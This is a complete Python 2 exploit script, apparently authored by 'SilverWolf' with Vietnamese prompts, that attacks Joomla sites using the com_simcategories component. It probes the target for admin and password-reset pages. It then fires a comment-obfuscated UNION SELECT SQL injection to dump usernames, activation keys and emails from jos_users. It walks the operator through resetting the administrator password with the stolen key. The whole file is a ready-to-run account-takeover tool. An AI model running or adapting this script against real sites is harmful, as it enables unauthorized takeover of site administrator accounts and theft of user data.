import re
import urllib2
import webbrowser
from urllib import urlencode
from sys import argv, exit

dict = {}

def main():
    print \
        'Joomla com_simcategories exploits\n' + \
        'Made By SilverWolf (http://nicedesigns.vv.si/)\n' + \
        'http://facebook.com/soibac\n'
    site = ''
    if len(argv) < 2:
        filename = argv[0].replace('\\', '/').split('/')[-1]
        print 'Vi du: ' + filename + ' http://target.com/index.php\n'
        site = raw_input('Duong dan site: ')
    else:
        site = argv[1]
    if checkSite(site) == 0:
        exit()
    exploits(site)
        
def checkIfSiteExists(s):
    print 'Kiem tra su ton tai cua site...'
    url = s
    htmlRes = urllib2.urlopen(url ,None, 120).read()
    if htmlRes:
        print "-->OK"
        return 1
    else:
        print "-->ERR"
        return 0
    
def checkIfAdminExists(s):
    print 'Kiem tra su ton tai cua administrator login...'
    action = 'administrator/'
    s1 = s[:len(s) - len('index.php')]
    url = s1 + action
    print url
    htmlRes = urllib2.urlopen(url ,None, 120).read()
    if htmlRes:
        tag = '<p id="form-login-username">'
        begin = htmlRes.find(tag)
        if begin == -1:
            print "-->ERR"
            return 0
        else:
            print "-->OK"
            return 1
    print "-->ERR"
    return 0
            
    
def checkIfResetPasswordExist(s):
    print 'Kiem tra su ton tai cua trang reset pass....'
    action = '?option=com_user&view=reset'
    url = s + action
    htmlRes = urllib2.urlopen(url ,None, 120).read()
    if htmlRes:
        tag = '<input id="email" name="email" type="text"'
        begin = htmlRes.find(tag)
        if begin == -1:
            print "-->ERR"
            return 0
        else:
            print "-->OK"
            return 1
    print "-->ERR"        
    return 0
    
def checkSite(s):
    rc = checkIfSiteExists(s)
    if rc == 0:
        return 0
    rc = checkIfResetPasswordExist(s)
    if rc == 0:
        return 0
    rc = checkIfAdminExists(s)
    return rc
    
def exploits(s):
    if getData(s) == 0:
        exit()
    action = "?option=com_user&view=reset"
    print "Dien email nay vao form va submit: " + dict[2]
    webbrowser.open(s + action)
    raw_input('Bam key bat ky de lay activation')
    if getData(s) == 0:
        exit()
    print "Dien activation key vao form: " + dict[1]
    print "CHUC VUI VE..."
    
def getData(s):
    sqli = "?option=com_simcategories&view=simprovider&id=-1'%20/*!UNION*/%20/*!SELECT*/%201,group_concat(0x24,0x24,0x24,username,0x7c,activation,0x7c,email,0x24,0x24,0x24),3,4,5,6,7%20from%20jos_users--%20-"
    url = s + sqli
    #print url
    htmlRes = urllib2.urlopen(url ,None, 120).read()
    if htmlRes:
        begin = htmlRes.find("$$$")
        if begin == -1:
            print "Khong the thuc hien sql injection...\n"
            print url
            return 0
        end = htmlRes.find("$$$",begin + 1)
        data = htmlRes[begin+3:end]
        print data
        arr = data.split("|")
        dict[0] = arr[0]
        dict[1] = arr[1]
        dict[2] = arr[2]
        print "----------------------------"
        print "Username: " + dict[0] + "\n"
        print "Activation: " + dict[1] + "\n"
        print "Email: " + dict[2] + "\n"
        print "----------------------------"
        return 1
        
if __name__ == '__main__':
    main()  